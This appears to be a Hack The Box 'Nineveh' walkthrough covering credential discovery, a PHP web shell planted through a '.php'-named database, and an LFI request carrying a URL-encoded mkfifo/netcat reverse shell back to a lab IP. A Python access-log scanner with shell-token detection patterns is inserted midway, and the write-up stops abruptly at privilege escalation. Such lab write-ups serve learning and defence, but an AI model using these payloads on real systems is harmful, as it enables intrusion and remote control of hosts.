Nineveh — HTB Walkthrough

ENUMERATION

80 HTTP ENUMERATION

Visiting the website and reading its source code reveals a set of credentials:
admin : 1q2w3e4r5t

443 ENUMERATION

Log in to the 443 site.
Create a database whose filename ends in .php (the write-up first tries hack.php, then uses ninevehNotes.php) with a table named shell; the field name carries the PHP payload and the default value is left empty.
DB : ninevehNotes.php ; table : shell ; Field Name : <?php echo system($_REQUEST["cmd"]); ?> ; default value : text (null)

EXPLOITATION

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%30%2e%31%34%2e%31%36%20%31%32%33%34%20%3e%2f%74%6d%70%2f%66
The notes parameter points the local file inclusion at the database file created above, and the cmd parameter carries a URL-encoded reverse-shell one-liner. In the original screenshot the upper bar shows the LFI request and the lower terminal shows the Netcat listener receiving the shell.
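From the defender's side, the request above leaves a clear trace in the web server access log: an include parameter holding an absolute path, a second parameter whose decoded value contains shell metacharacters, and percent-encoding of plain letters (`%72%6d` for `rm`) that hides the command from naive grep-based review. The following is an added example, not part of the original write-up, that scans combined-format access log lines for these three indicators. The log lines are constructed for the example (the first one reproduces the start of the request shown above); the function names and thresholds are my own choices.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Substrings and metacharacters that rarely belong in a legitimate query value.
SHELL_TOKENS = ("mkfifo", "/bin/sh", "/bin/bash", "bash -i", "nc ", "2>&1")
SHELL_META = re.compile(r"[;|`]|\$\(")

# Constructed sample log; line 1 mirrors the write-up's LFI + cmd request,
# line 2 is benign, line 3 is a classic traversal attempt.
SAMPLE_LOG = """\
10.10.14.16 - - [01/Jan/2024:12:00:00 +0000] "GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66 HTTP/1.1" 200 512
10.10.14.16 - - [01/Jan/2024:12:00:01 +0000] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 312
10.10.14.20 - - [01/Jan/2024:12:00:02 +0000] "GET /department/manage.php?notes=../../../../etc/passwd HTTP/1.1" 200 1024
"""


def overencoded(raw_value: str) -> bool:
    """True if the still-encoded value percent-encodes four or more plain
    letters/digits. Browsers never encode those, so this is an evasion signal."""
    hex_pairs = re.findall(r"%([0-9A-Fa-f]{2})", raw_value)
    return sum(chr(int(h, 16)).isalnum() for h in hex_pairs) >= 4


def inspect_query(raw_query: str) -> list:
    """Return finding tags of the form 'lfi:<param>', 'cmd:<param>', 'encoded:<param>'."""
    findings = []
    for pair in raw_query.split("&"):
        if not pair:
            continue
        name, _, raw_value = pair.partition("=")
        name = unquote_plus(name)
        value = unquote_plus(raw_value)
        # Absolute paths or traversal sequences in any parameter: LFI indicator.
        if value.startswith("/") or "../" in value:
            findings.append(f"lfi:{name}")
        # Shell separators/substitution or reverse-shell building blocks: RCE indicator.
        if SHELL_META.search(value) or any(t in value for t in SHELL_TOKENS):
            findings.append(f"cmd:{name}")
        if overencoded(raw_value):
            findings.append(f"encoded:{name}")
    return findings


def scan_log(text: str) -> list:
    """Parse each log line and return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in combined format
        parts = urlsplit(match.group("target"))
        findings = inspect_query(parts.query)
        if findings:
            alerts.append({"ip": match.group("ip"), "path": parts.path, "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ip']} {alert['path']} -> {', '.join(alert['findings'])}")
```

Run against the constructed sample the scanner reports the first line with all three tags and the third line as a traversal attempt, while the benign request is ignored. The absolute-path rule will also fire on legitimate applications that pass server paths in query strings, so tune it to the application's real parameter set before using it for alerting.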
Transfer both images to the attacker machine.
Running strings on both, Nineveh.png contains an SSH key pair: the private key
and the public key.
Using the private key to SSH in as amrois gives access to user.txt.

PRIVILEGE ESCALATION

A cron job is running.

OSCP | CEH | Cyber Security Enthusiast.
